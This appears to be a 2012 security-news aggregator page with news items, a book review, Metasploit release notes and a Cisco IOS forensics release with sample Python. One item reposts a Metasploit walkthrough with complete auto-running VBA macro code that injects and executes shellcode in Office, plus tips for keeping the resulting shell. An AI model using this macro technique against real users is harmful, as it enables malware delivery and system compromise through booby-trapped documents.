no one is safe ...

Security News


WikiLeaks informant must face US military court

Sat, 2012-02-04 09:00
Bradley Manning indicted on 22 counts

(author unknown)

Direct Shellcode Execution via MS Office Macros with Metasploit

Fri, 2012-02-03 23:21
scriptjunkie recently had a post on direct shellcode execution in MS Office macros. I didn't see it go into the Metasploit trunk, but it's there. How to generate the macro code is in the post, but I'll repost it here so I don't have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit the Visual Basic button to change the code around.

msf > use payload/windows/exec
msf payload(exec) > set CMD calc
CMD => calc
msf payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf payload(exec) > generate -t vba
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#EndIf

Sub Auto_Open()
Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
#If Vba7 Then
Dim Xlbufvetp As LongPtr
#Else
Dim Xlbufvetp As Long
#EndIf
Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _
235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _
224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _
187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)
Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
Wyzayxya = Hyeyhafxp(Zolde)
Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
Next Zolde
Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
The important thing to remember is that with this method you will NOT be dropping a .vbs or .bin file on disk: the shellcode runs inside the Excel/Word/whatever process itself, so you need to set up an AutoRunScript or a migrate step (for example set AutoRunScript post/windows/manage/migrate on the handler) to move out of that process, otherwise you lose the shell as soon as the user closes the Office application. Note also that the generated code sizes the VirtualAlloc call with UBound(), which is one less than the array length; it only works because VirtualAlloc rounds the allocation up to a whole page.

Anonymous humiliates FBI and Scotland Yard

Fri, 2012-02-03 19:57
Anonymous activists eavesdropped on a confidential conference call between Scotland Yard and the FBI and published the recording online. The FBI has since confirmed the authenticity of the audio file.(author unknown)

BSI recommendations for secure Windows PCs

Fri, 2012-02-03 18:10
Antivirus software, backups, updates, an alternative browser and a healthy dose of suspicion are the cornerstones of the BSI's concept for a secure PC.(author unknown)

Hack Naked TV Episode 26

Fri, 2012-02-03 17:52

In this episode we talk about Symantec, introduce a very cool (and free) spear-phishing tool, cover the VeriSign attack, and discuss RFID implications and microwave cooking directions for credit cards.

Links for this Episode:

  1. New spear-phishing tool
  2. VeriSign hack
  3. RFID and credit cards
  4. Offensive Countermeasures in Orlando!

(author unknown)

{book review} The Tangled Web

Fri, 2012-02-03 14:30

It’s been 6 years since Michal Zalewski’s “Silence on the Wire” hit the shelves. Although “The Tangled Web” concentrates on a completely separate set of issues, you can’t help but draw comparisons between the two books. Zalewski’s unique style of writing brings both topics to life, not simply scratching the surface of a set topic, but diving headlong into the lowest levels to give the reader a true understanding of the reasons why, and the thought processes behind, any feature, bug, or technology discussed. The Tangled Web does for web applications what Silence on the Wire did for computers and networks.

The Tangled Web is split into 3 parts, starting off with a concise walk-through of the underlying technologies of the web. Unlike so many other books that take for granted that the reader is already up to par on the backstory, Zalewski takes the time to really dig deep into the tools, protocols and RFCs that run the modern web.

Part 1: Anatomy of the web
    • It starts with a URL
    • Hypertext Transfer Protocol
    • Hypertext Markup Language
    • Cascading Style Sheets
    • Browser Side Scripts
    • Non-HTML Document Types
    • Content Rendering with Browser plug-ins

This not-always-pretty romp through an alphabet soup of acronyms gives the reader the knowledge needed not only to understand and appreciate the second part of the book as it should be, but is in my mind the single best source for anybody looking to really understand the web as it works today. Not the way you think it works, the way it should work, or the way the RFCs say it needs to work, but the down and dirty truth behind the web. Nothing is what it seems, and when you place the safety of your computer in the hands of browser vendors, it seems you’re never quite sure what you’re going to get.

Part 2 of the book moves from understanding the web to understanding how browsers see and interpret the web, and how the browser security models really work. You’d think every browser would see things and handle things the same, but after even the first few pages you get the feeling that no 2 browsers are going to handle things the way you expect, or want!

Part 2: Browser Security Features
    • Content Isolation Logic
    • Origin Inheritance
    • Life Outside Same-Origin Rules
    • Other Security Boundaries
    • Content Recognition Mechanisms
    • Dealing With Rogue Scripts
    • Extrinsic Site Privileges

Zalewski covers the very fundamentals the current generation of browsers use to protect users in a way that just seems to make things click. Even when discussing things like same-origin policy and how the different browsers interpret the rules, the information just seems to make sense without needing to re-read sections over and over (an issue I had with some of the “Silence on the Wire” content at times). A common theme that comes up in part 2 of the book is the “sins of the old”, where browsers are suffering from security issues due to lack of foresight. As more and more band-aids are stuck onto the browser security models, things become ever more complex. It’s sad to see, however, that companies still aren’t learning from this lack of foresight as issues crop up again and again (for example <canvas> loading of cross-domain images, an issue that’s since been resolved).

Those who cannot remember the past are condemned to repeat it. (George Santayana)

The chapter discussing “Content Recognition Mechanisms” could easily be renamed “101 reasons to always set a charset”. The sniffing logic of browsers is both scary and often abused. What struck me more than the scary quirks of certain browsers was that most people just aren’t aware of these issues… I know I wasn’t!

Moving into part 3 of the book, Zalewski talks about what’s to come in terms of browser advancements.

Part 3: A Glimpse Of Things To Come
    • New And Upcoming Security Features
    • Other Browser Mechanisms Of Note
    • Common Web Vulnerabilities

Despite what the first 2 parts of The Tangled Web bring to light, it doesn’t seem that browser vendors have learnt the lesson from history. New features seem once again to be applied unevenly across browsers, with Microsoft going their own route with things like XDomainRequest. Not to be left out in the cold, Mozilla’s drive for CSP is discussed in depth along with other restriction frameworks. There are a lot of ideas in this space it seems, but little consensus on how or what to implement.

Conclusions

I love this book… there’s no other way to say it. Every once in a while you get a book that’s well written, contains good content and sparks those little ideas in the back of your brain. For me, the tangled web met all of these points and then some. A book that gives you so much background on the how and the why of things, that you come out the other end really feeling like you know the subject matter.

That said, I’m not 100% sure who this book is targeted at… the addition of the “security engineering cheat sheets” at the end of each chapter is a great idea, and for a defender it provides some really good information. However, I’m not sure I know many defenders that would pick this book up and give it the time it really deserves. Maybe I’m wrong on this, and I hope I am.

I also didn’t see it being something the attacker types would be jumping all over themselves to read either. It’s not full of the usual hacking tips, tricks and tools you’ve come to expect from hacker books in the last few years. The information is more than that, I find, but it needs to be applied to other ideas to be really useful. Still, from a discussion with No Starch at ShmooCon, they sold out of The Tangled Web, so I hope I’m wrong on this too.

TL;DR: Read this book… give it your full attention, and come out the other end smarter for it!


Tagged: nostarch, tangled web, Zalewski

#4 Nessus Licenses & Usage - Top Ten Things You Didn't Know About Nessus

Fri, 2012-02-03 13:00

The video below is part 4 in our series of the top ten things you didn't know about Nessus and covers how to schedule scans from within Nessus:


Google hunts for viruses in the Android Market

Fri, 2012-02-03 11:10
An automated service analyses every app in the Android Market and removes it if it looks suspicious. This is said to have already led to a decrease in malware.(author unknown)

Social-Engineer.Org in 2012 – More Growth and Exciting News

Fri, 2012-02-03 05:27

For almost 3 years the team at Social-Engineer.Org has been bringing you the best in social engineering information and education: tips, tricks and research, which has eventually branched off into live, in-person, intensive training classes. As the new year gets into full swing we wanted to highlight some of our upcoming events and announcements.

Chris “loganWHD” Hadnagy will be conducting a round table open discussion at RSA this year. The topic of his panel is “Social Engineering – Is it the Biggest Threat?” Social Engineering (SE) is a hot topic that has gained a lot of notoriety in recent attacks.

Anonymous claims it is using SE in all of its attacks, yet despite the wake of devastation, companies are still reluctant to accept Social Engineer Penetration Tests. Is SE a big threat? If so what NEEDS to be done to protect business from this threat? Find out at RSA!

RSA Conference – March 1st, 2012 @ 2:10pm – Moscone Center, San Francisco, CA

This year also marks the start of Social-Engineer.Com’s exciting new 5-day, intensive, live, hands-on classes dubbed Social Engineering for Penetration Testers. We are excited to announce that just 1 month after going live with our dates, our April classes in Bristol, UK are completely SOLD OUT! Seats for this groundbreaking class and certification are going fast!

If the class sells out and you don’t get in – we don’t want to hear any whining. This course is not simply a set of lectures, it’s a hands-on, interactive class led by two of the industry’s most knowledgeable and trusted sources for all things Social Engineering, Chris Hadnagy and Robin Dreeke. This class will give you the skills necessary to take on the Social Engineering Pentest Professional (S.E.P.P.) certification. (as well as give you 40 CPE credits) The Social Engineering for Penetration Testers course will be held in the following locations at dates specified:

March 5th – 9th, 2012 – Seattle, WA, USA
April 9th – 13th, 2012 – Bristol, UK – SOLD OUT
July 21st – 24th, 2012 – Black Hat Conference, Las Vegas, NV, USA
August 20th – 24th, 2012 – Bristol, UK
November 12th – 16th, 2012 – Columbia, MD, USA

Eric “Urbal” Maxwell will present full analysis of the data collected during the 2011 Social Engineer Capture the Flag contest held at Defcon 19. This data includes an in-depth look at the contest, the targets, the attackers, and everything in between. Data analyzes how individual companies performed against the attacks, differences in industry defense, types of attacks, tools used, pretexts, attack vectors, and what could have been done to mitigate such attacks. This presentation can be heard at the following events:

2600 – PHX2600 – Feb 3rd, 2012

BSides Phoenix – February 18th, 2012 – Dave & Busters, Tempe, AZ

Also, in January 2012, the SEORG team took over PenTest Magazine and authored 5 articles on Social Engineering!

Mastering the Behavioral Techniques for Quick Rapport and Elicitation – Robin Dreeke
Primer on Priming – Eric Maxwell
Neuro-Linguistic Hacking – Chris Hadnagy
The Power of the Ultimate Social Engineer – Chris Hadnagy
Selling Social Engineering Services – Jim O’Gorman
The Top Five Social Engineering Mitigation Tips – Chris Hadnagy

Of course, we can’t fail to mention that Defcon 20 rapidly approaches.  The SE CTF will be bigger, badder, and sexier than ever. This year (SPOILER ALERT) the SE CTF will be a “Battle of SExes”.  Want more details than that?  You’ll have to wait.  But we are presently searching for willing companies who want to work with us as sponsors, targets and supporters.  We will be announcing the events soon.

In addition, we have been asked to come up with another year of the SE CTF for Kids!  If you thought last year was crazy, this year will prove to be even more amazing.  There will be some serious changes in how this event is structured – it will be more challenging, more fun, and even crazier than last year.

2012 is shaping up to be an exciting year for computer security, social engineering, and especially Social-Engineer.org! Stay tuned for everything you have come to expect… informative blogs, hard-hitting newsletters, engaging podcasts, automated toolkits, world-renowned Capture the Flag contests, and industry standard how-to books… and even things you never saw coming… 5-Day LIVE classes taught by the pros! Stay tuned to Social-Engineer, we’re just getting started!

MSUpdate Trojan attacked defence contractors

Fri, 2012-02-03 00:07
The lure was a well-crafted invitation to a prestigious conference. It then smuggled spyware onto the computers of the companies' employees.(author unknown)

Break-ins at domain registrar VeriSign in 2010

Thu, 2012-02-02 20:57
At the end of 2011 the US company reported to the authorities several intrusions into its IT systems that took place in 2010. It does not believe, however, that anything important was stolen.(author unknown)

HTC smartphones sloppy with Wi-Fi passwords

Thu, 2012-02-02 17:45
With a simple trick, apps on certain HTC smartphones can read out the Wi-Fi password they were never meant to see.(author unknown)

NRW police go offline for fear of hackers

Thu, 2012-02-02 17:00
The North Rhine-Westphalia police have now been unreachable from the Internet for the second day. A security vulnerability was discovered during checks of the communication system.(author unknown)

Critical PHP vulnerability is being fixed right now

Thu, 2012-02-02 16:10
The PHP developers are working feverishly to remove a critical security vulnerability in PHP that they themselves introduced with a security patch. The full extent cannot yet be gauged.(author unknown)

Ukraine: hackers declare "cyber war" on government

Thu, 2012-02-02 15:00
After the popular file-sharing site Ex.ua was taken offline by the authorities, Ukrainian hackers have struck back and knocked out the websites of the government, the secret service and the central bank.

(author unknown)

Joe Stewart and Jon Oberheide on Episode 276

Thu, 2012-02-02 14:00

Tonight, get the real story on APT, Shady RAT, and HTran from one of the leading researchers on APT, Joe Stewart of the Counter Threat Unit of Dell SecureWorks. We follow up with a Guest Tech Segment on the current state of Android (in)security and malware with Jon Oberheide. This will be a great episode which you won't want to miss, all live on Episode 276 of PaulDotCom Security Weekly!

Participate in our IRC channel or sit back and enjoy it live via the link below:

NOTE: The video will play the most recent show up until we are live!

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or if you prefer, visit the Episode 276 show notes page.

- Paul Asadoorian, Larry Pesce, Jack Daniel, Carlos Perez, John Strand, Darren Wigley, and Mike Perez.

(author unknown)

Apple releases Mac OS X 10.7.3

Thu, 2012-02-02 00:15
The update is said to improve, among other things, the stability, compatibility and security of the operating system.(author unknown)

Jonathan Cran modified Metasploit Pro 4.1.4 Update 20120131000002

Wed, 2012-02-01 23:23
Summary

This weekly update brings 8 new modules and a bucket o' bugfixes. Modules include pcAnywhere TCP and UDP scanners, VMware Web login scanners, an exploit for MS12-004 (midiOutPlayNextPolyEvent Heap Overflow) and VirtualBox and VMware enumeration modules. Also included are a default password scanner for Ektron CMS400.NET, a vBSEO <= 3.6.0 code injection module and an overflow for HP Diagnostics Server.

Module Changes

Resolved Bugs & Changes
  • Issue #6294 : Meterpreter uses native Windows stat struct for file info.
  • Issue #6278 : vmauthd module now alerts users when it's unable to connect.
  • Issue #6277 : http_fingerprint now uses report_web_site call.
  • Issue #6297 : Hash dump crack no longer delays other actions.
  • Issue #6291 : Small task.info is handled.
  • Issue #6266 : Discover now handles case where excluded_ips == included_ips.
  • Issue #6260 : Post modules handle EOFError.
  • Issue #6235 : Report generation for compromised hosts handles exception.
  • Issue #6217 : Searching modules handles UTF-8.
  • Issue #6208 : Cloning a bruteforce task after deleting an imported cred file now handles errors.
  • Issue #6199 : Evidence Collection has been renamed.
  • Issue #6192 : Virtual Hosts are now identified as XXXX as part of the Discovery phase.
  • Issue #6061 : Target Addresses field is too small for IPv6 addresses.
  • Issue #6056 : PostgreSQL scanner now connects to IPv6 targets.

How to Upgrade

Metasploit Pro is upgraded using the Administration menu and choosing the option Software Upgrade. To see how to upgrade your Metasploit installation, view this video in the Rapid7 Community.

Version Information

PRO 4.1.4 20120124000001 revision 7417aa694e8bbe5b3658db71b62185c1bba63838 updates to 20120131000002 revision d175997e660a00cf78e6394e58d604535975bdf9

MSF3 4.1.4 20120124000001 revision 7ec5f9848093d2d16fd8422c40b01ec50ec4d59f updates to 20120131000002 revision ba50f84229acf3713cffe2167169ca0f4fb9c6c1

no-reply@rapid7.com

2011 Toolsmith Tool of the Year: OWASP ZAP

Wed, 2012-02-01 21:58


Congratulations to the OWASP ZAP team!
The Zed Attack Proxy is the 2011 Toolsmith Tool of the Year.
ZAP finished with 338 votes (36.5% of the total), slightly edging out Security Onion.
SO finished a strong second place with 328 votes (35.4%).
Volatility came in third with 152 (16.4%) and Armitage right on their heels in fourth with 148 votes (16%).

I am donating $50 to the OWASP ZAP project to honor this win.
I ask that those of you with the wherewithal and resources to do so please visit the project page and donate in any capacity you can.

Congratulations and thank you to all participants this year and I look forward to a strong 2012.

noreply@blogger.com (Russ McRee)

Cisco Incident Response (CIR) 1.1 Open Source Release

Wed, 2012-02-01 20:07

Recurity Labs created a system for the inspection of Cisco legacy IOS memory dumps back in 2008. The tool, called Cisco Incident Response, was meant to identify successful and unsuccessful exploits of binary nature against Cisco routers running IOS 11.x and 12.x. IOS 15.x is now available, but doesn't differ much from the previous releases in terms of internal design.

We ran an online service for uploading and analyzing IOS images together with core dumps generated from them. This service has been used by various people, but not a single core dump contained indications of an actual binary exploit against the platform. It seems that it's simply too easy to pwn a company by traditional means of browser, Flash, Java, EXE file in email, social engineering or cloud service.

To support nostalgic hobbyists concerning themselves with the same questions half a decade later, we decided to publish the source code of CIR today, so that anyone can use it and inspect its inner workings. We believe that Kerckhoffs's principle also holds for defense and detection systems, so it is instructive to look at code bases that have been tested in production for quite some time.

The code is interesting beyond the embedded knowledge about Cisco IOS data structures. Here are a couple of points for the inclined reader:

  • 23k lines of code, completely managed .NET (C#)
  • Plug-in based knowledge system, where every plug-in consumes and provides some type of abstracted information about the subject, formulated by .NET types
  • Several lists with differing offsets between IOS minor versions and service releases, for those assuming that IOS data structures will always look the same between e.g. 12.4.3 and 12.4.3J.
  • An ELF file format parser that could be useful in other projects
  • Report generation and daemon mode, to allow CIR to be used in corporate and provider networks automatically.
The code is released under GPLv3, and can be found at http://cir.recurity.com. We also provide a binary distribution for those who simply want to use it.

FX
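The kind of check a tool like CIR runs over an image plus its core dump can be shown with a self-contained example (added here; it is not CIR's code and does not use its plug-in system or the version-specific offset tables): parse the ELF32 program headers of the image, pick the executable PT_LOAD segment, and diff that address range against what the memory dump captured. A run of bytes that differs from the image on disk is the trace a binary exploit or an inline hook leaves in the text segment; a dump that does not cover the segment is reported as uncaptured rather than silently passed. The image, its code bytes and the dump regions are constructed inline, and EI_DATA is honoured because IOS images are big-endian.

```python
import struct
from collections import namedtuple

PT_LOAD, PF_X = 1, 0x1
Segment = namedtuple("Segment", "p_type p_flags p_offset p_vaddr p_filesz p_memsz")
Finding = namedtuple("Finding", "kind vaddr expected actual")   # kind: "modified" or "uncaptured"

def parse_elf32_segments(image: bytes) -> list:
    """Program headers of an ELF32 image; offsets follow the ELF32 Ehdr/Phdr layout."""
    if image[:4] != b"\x7fELF" or image[4] != 1:          # EI_MAG, EI_CLASS == ELFCLASS32
        raise ValueError("not an ELF32 image")
    end = {1: "<", 2: ">"}[image[5]]                       # EI_DATA: 1 = LSB, 2 = MSB (IOS)
    e_phoff, = struct.unpack_from(end + "I", image, 28)
    e_phentsize, e_phnum = struct.unpack_from(end + "HH", image, 42)
    segs = []
    for i in range(e_phnum):
        p_type, p_offset, p_vaddr, _paddr, p_filesz, p_memsz, p_flags, _align = \
            struct.unpack_from(end + "8I", image, e_phoff + i * e_phentsize)
        segs.append(Segment(p_type, p_flags, p_offset, p_vaddr, p_filesz, p_memsz))
    return segs

def read_dump(regions: dict, vaddr: int, size: int):
    """regions maps base address -> captured bytes; None if the range is not fully captured."""
    for base, data in regions.items():
        if base <= vaddr and vaddr + size <= base + len(data):
            return data[vaddr - base: vaddr - base + size]
    return None

def diff_code_segments(image: bytes, regions: dict) -> list:
    """Compare every executable PT_LOAD segment with the dump; report runs of changed bytes."""
    findings = []
    for s in parse_elf32_segments(image):
        if s.p_type != PT_LOAD or not s.p_flags & PF_X:
            continue
        expected = image[s.p_offset: s.p_offset + s.p_filesz]
        actual = read_dump(regions, s.p_vaddr, s.p_filesz)
        if actual is None:
            findings.append(Finding("uncaptured", s.p_vaddr, expected, None))
            continue
        i = 0
        while i < len(expected):
            if expected[i] == actual[i]:
                i += 1
                continue
            j = i
            while j < len(expected) and expected[j] != actual[j]:
                j += 1
            findings.append(Finding("modified", s.p_vaddr + i, expected[i:j], actual[i:j]))
            i = j
    return findings

def build_sample_image(code: bytes, vaddr: int = 0x80008000) -> bytes:
    """Constructed ELF32 big-endian MIPS executable with one RX PT_LOAD segment."""
    ident = b"\x7fELF" + bytes([1, 2, 1]) + bytes(9)     # ELFCLASS32, ELFDATA2MSB, EV_CURRENT
    ehdr = ident + struct.pack(">HHIIIIIHHHHHH", 2, 8, 1, vaddr, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack(">8I", PT_LOAD, 84, vaddr, vaddr, len(code), len(code), 0x5, 4)  # PF_R|PF_X
    return ehdr + phdr + code

# Constructed scenario: 32 bytes of "code" in the image; the dump has 4 bytes at
# offset 8 overwritten (a patched instruction) plus an unrelated second region.
SAMPLE_CODE = bytes(range(0x10, 0x30))
SAMPLE_IMAGE = build_sample_image(SAMPLE_CODE)
SAMPLE_DUMP = {
    0x80008000: SAMPLE_CODE[:8] + b"\x03\xe0\x00\x08" + SAMPLE_CODE[12:],
    0x80100000: bytes(16),
}

if __name__ == "__main__":
    for f in diff_code_segments(SAMPLE_IMAGE, SAMPLE_DUMP):
        print(f.kind, hex(f.vaddr), f.expected, f.actual)
```

Against the sample this reports one modified run of four bytes at 0x80008008. On a real image the comparison has to respect the segment's filesz/memsz split and any relocation or self-decompression the platform performs before the code is live, which is exactly the per-version knowledge CIR keeps in its offset tables.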